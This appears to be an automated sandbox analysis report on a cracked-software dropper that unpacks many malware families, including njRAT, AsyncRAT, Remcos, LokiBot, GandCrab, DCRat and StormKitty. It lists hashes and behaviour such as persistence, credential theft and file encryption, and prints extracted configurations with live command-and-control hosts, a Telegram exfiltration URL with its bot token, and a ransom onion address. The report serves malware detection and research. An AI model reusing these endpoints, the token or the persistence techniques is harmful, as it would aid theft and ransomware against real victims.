Analysis
-
max time kernel
77s -
max time network
141s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
07-09-2024 04:51
Static task
static1
Behavioral task
behavioral1
Sample
クラック.exe
Resource
win7-20240903-en
General
-
Target
クラック.exe
-
Size
17.8MB
-
MD5
61bcb94052e57f07e8c662a80d8c29c1
-
SHA1
db9d2e9e37eddedc1722727e8ce5a0a242a9ff10
-
SHA256
3b0cfdd500288507ec287e0e2f33d7acb7a2bcad1537fcfb29a47a4fa7cc23a6
-
SHA512
7f9f9c2c6cd5dd49baf6791808e5a31c9e4726d27f87aaad8e2df75ab2a0dbf20956d0bab8761a9e742d1fa85052f9f7f0ae8e6cf269a0761053786e547935a1
-
SSDEEP
49152:U6m1Vv6+nTCnjhT5iD1hTIUGzVnDk7Q3xCDza91PU3i/hv/kklWHvv7vTRZOp6/u:Um
Malware Config
Extracted
njrat
<- NjRAT 0.7d Horror Edition ->
Victim
great-it.gl.at.ply.gg:11149
4d5861675348411506f0e029827092c2
-
reg_key
4d5861675348411506f0e029827092c2
-
splitter
Y262SUCZ4UJJ
Extracted
njrat
im523
puked
147.185.221.20:47570
20006afb0ec33f2e48c8c1f17d4d3382
-
reg_key
20006afb0ec33f2e48c8c1f17d4d3382
-
splitter
|'|'|
Extracted
asyncrat
Default
127.0.0.1:6606
127.0.0.1:7707
127.0.0.1:8808
https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=5795480469
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Extracted
njrat
0.7d
чучундра
hakim32.ddns.net:2000
safety-bronze.gl.at.ply.gg:4444
27b92504703b09d3ee2dae0873e8e3f3
-
reg_key
27b92504703b09d3ee2dae0873e8e3f3
-
splitter
|'|'|
Extracted
njrat
0.7d
HacKed
192.168.1.42:5552
bf7b1fe7a7644171a9985ea45221c25c
-
reg_key
bf7b1fe7a7644171a9985ea45221c25c
-
splitter
|'|'|
Extracted
remcos
AUGUST CRYPTER TOOLZ GRACE STUB
teamfavour222.ddns.net :6767
odogwuvisual123.duckdns.org:6767
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
-YFLE4M
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Extracted
C:\Users\QKDLRB-DECRYPT.txt
http://gandcrabmfe6mnef.onion/c0998853607f40ce
Extracted
lokibot
http://45.133.1.20/oluwa/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
DcRat 64 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeクラック.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 3548 schtasks.exe 956 schtasks.exe 3452 schtasks.exe 908 schtasks.exe 2232 schtasks.exe 3104 schtasks.exe 3300 schtasks.exe 3692 schtasks.exe 2920 schtasks.exe 3260 schtasks.exe 1852 schtasks.exe 1620 schtasks.exe 1048 schtasks.exe 3780 schtasks.exe 1660 schtasks.exe 1644 schtasks.exe 3416 schtasks.exe 2360 schtasks.exe 2196 schtasks.exe 1712 schtasks.exe 1684 schtasks.exe 2128 schtasks.exe 3468 schtasks.exe 804 schtasks.exe 1740 schtasks.exe 2856 schtasks.exe 2132 schtasks.exe 2088 schtasks.exe 1924 schtasks.exe 1400 schtasks.exe 2408 schtasks.exe 3196 schtasks.exe 3284 schtasks.exe 3816 schtasks.exe 3692 schtasks.exe 1892 schtasks.exe 2864 schtasks.exe 2588 schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language クラック.exe 2032 schtasks.exe 3392 schtasks.exe 2416 schtasks.exe 904 schtasks.exe 2648 schtasks.exe 2212 schtasks.exe 2908 schtasks.exe 2024 schtasks.exe 1944 schtasks.exe 2676 schtasks.exe 3216 schtasks.exe 2352 schtasks.exe 1992 schtasks.exe 1732 schtasks.exe 3264 schtasks.exe 2740 schtasks.exe 2580 schtasks.exe 904 schtasks.exe 376 schtasks.exe 2656 schtasks.exe 2956 schtasks.exe 2380 schtasks.exe 4020 schtasks.exe 1624 schtasks.exe 2976 schtasks.exe -
Gandcrab
Gandcrab is a Trojan horse that encrypts files on a computer.
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
Client.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Sub\\Client.exe" Client.exe -
Process spawned unexpected child process 63 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1988 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1740 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1852 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1992 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2352 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2920 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2656 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1660 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 804 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2416 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2740 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2232 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2212 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1644 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1620 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2648 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2032 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1944 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1684 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1608 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1048 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2588 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1936 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2196 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2024 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 956 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1924 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2856 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1728 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2088 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2580 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 924 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1400 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3004 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1752 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2956 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1532 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1712 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2128 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 908 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1732 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 376 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 904 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2408 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2380 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2676 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2908 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2352 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3104 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3176 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3196 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3260 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3284 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3300 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3392 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3416 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3452 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4020 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3548 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3780 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 904 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3692 2940 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3816 2940 schtasks.exe wmiprvse.exe -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 2 IoCs
Processes:
resource yara_rule C:\Program Files (x86)\7f1630df6b57af024a3b561bdadc208f.exe family_stormkitty behavioral1/memory/2744-81-0x0000000000950000-0x0000000000982000-memory.dmp family_stormkitty -
Async RAT payload 1 IoCs
Processes:
resource yara_rule C:\Program Files (x86)\7f1630df6b57af024a3b561bdadc208f.exe family_asyncrat -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Processes:
resource yara_rule \Program Files (x86)\5e710462c65fe899466e4fb7c1e33c9a.exe dcrat C:\Program Files (x86)\73c1c41b9e71c48e752a5cd19fe808b6.exe dcrat behavioral1/memory/2564-116-0x0000000001190000-0x0000000001266000-memory.dmp dcrat behavioral1/memory/2520-118-0x0000000000EA0000-0x0000000000F76000-memory.dmp dcrat behavioral1/memory/1652-1001-0x00000000000E0000-0x00000000001B6000-memory.dmp dcrat -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Detected Nirsoft tools 18 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
Processes:
resource yara_rule behavioral1/memory/2564-1593-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral1/memory/2564-1592-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral1/memory/884-1591-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral1/memory/1224-1641-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral1/memory/3964-1650-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral1/memory/2248-1661-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral1/memory/884-1660-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral1/memory/2564-1670-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral1/memory/3964-1713-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral1/memory/2248-1719-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral1/memory/3964-1916-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral1/memory/884-1931-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral1/memory/3764-2299-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral1/memory/1224-2357-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral1/memory/1864-2359-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral1/memory/4024-2364-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral1/memory/2920-2497-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral1/memory/3856-2581-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft -
NirSoft MailPassView 5 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral1/memory/2564-1593-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView behavioral1/memory/2564-1592-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView behavioral1/memory/2564-1670-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView behavioral1/memory/3764-2299-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView behavioral1/memory/1864-2359-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 8 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral1/memory/884-1591-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView behavioral1/memory/3964-1650-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView behavioral1/memory/884-1660-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView behavioral1/memory/3964-1713-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView behavioral1/memory/3964-1916-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView behavioral1/memory/884-1931-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView behavioral1/memory/2920-2497-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView behavioral1/memory/3856-2581-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Renames multiple (166) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Renames multiple (337) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Drops file in Drivers directory 2 IoCs
Processes:
BTZ.exe938b92958ded4d50a357d22eddf141ad.exedescription ioc process File created C:\Windows\SysWOW64\DRIVERS\atmarph.sys BTZ.exe File created C:\Windows\SysWOW64\DRIVERS\atmarpk.sys 938b92958ded4d50a357d22eddf141ad.exe -
Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
-
Modifies Windows Firewall 2 TTPs 3 IoCs
Processes:
netsh.exenetsh.exenetsh.exepid process 1400 netsh.exe 3296 netsh.exe 3992 netsh.exe -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Drops startup file 7 IoCs
Processes:
svhost.exewermgr.exeserver.exe78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\619680d438aded33a3114805b64591c9.exe svhost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\QKDLRB-DECRYPT.txt wermgr.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\607f4723607f40c11f.lock wermgr.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\20006afb0ec33f2e48c8c1f17d4d3382.exe server.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\20006afb0ec33f2e48c8c1f17d4d3382.exe server.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\QKDLRB-DECRYPT.txt 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\619680d438aded33a3114805b64591c9.exe svhost.exe -
Executes dropped EXE 59 IoCs
Processes:
2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe5e710462c65fe899466e4fb7c1e33c9a.exe7f1630df6b57af024a3b561bdadc208f.exe31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe57ccb6f0bd910fed428761828ae93553.exe70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe73c1c41b9e71c48e752a5cd19fe808b6.exe78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe938b92958ded4d50a357d22eddf141ad.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exea6a1abaf12a28ea8f6553356c3bdcf57.exeBTZ.exeCat.exeClient.exeevil.exeDarkest Dungeon setub.exefwclt.exeGandcrab5.0.3.exekosomk.exemalecus.exeHappy18.exeLightNeuronX0.exesee7.exeTEST.exevbc.exevirus.jk.execbgsujmwws.execsrss.execbgsujmwws.exefwclt.exeevil.exedicsord.exe78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exeserver.exesvhost.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exeSystem.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exesee7.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exeMicrosoft To Do.exewowmgr.exepid process 484 2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe 2520 5e710462c65fe899466e4fb7c1e33c9a.exe 2744 7f1630df6b57af024a3b561bdadc208f.exe 2672 31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe 2784 34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2164 70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe 1636 75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe 2564 73c1c41b9e71c48e752a5cd19fe808b6.exe 1016 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe 1612 938b92958ded4d50a357d22eddf141ad.exe 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 2936 a6a1abaf12a28ea8f6553356c3bdcf57.exe 776 BTZ.exe 2064 Cat.exe 832 Client.exe 828 evil.exe 2192 Darkest Dungeon setub.exe 3044 fwclt.exe 1048 Gandcrab5.0.3.exe 3068 kosomk.exe 2332 malecus.exe 1484 Happy18.exe 1524 LightNeuronX0.exe 2692 see7.exe 2124 TEST.exe 2620 vbc.exe 2984 virus.jk.exe 2604 cbgsujmwws.exe 1652 csrss.exe 572 cbgsujmwws.exe 3112 fwclt.exe 3640 evil.exe 3516 dicsord.exe 3592 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe 3748 server.exe 1672 svhost.exe 884 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 2564 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 1224 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 3964 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 1864 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 2248 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 2920 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 3764 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 3796 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 3856 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 2900 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 3116 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 2128 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 3888 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 4024 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 3644 System.exe 3864 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 1916 see7.exe 2768 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 2868 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 1784 Microsoft To Do.exe 1348 wowmgr.exe -
Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
Processes:
BTZ.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WOWManager BTZ.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WOWManager\ = "Service" BTZ.exe -
Loads dropped DLL 53 IoCs
Processes:
クラック.exeBTZ.exevbc.execbgsujmwws.exe938b92958ded4d50a357d22eddf141ad.exeevil.exekosomk.exe31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exeDarkest Dungeon setub.execmd.exepid process 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 776 BTZ.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 1968 クラック.exe 2620 vbc.exe 2604 cbgsujmwws.exe 1612 938b92958ded4d50a357d22eddf141ad.exe 1612 938b92958ded4d50a357d22eddf141ad.exe 828 evil.exe 3068 kosomk.exe 2672 31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe 2192 Darkest Dungeon setub.exe 3564 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
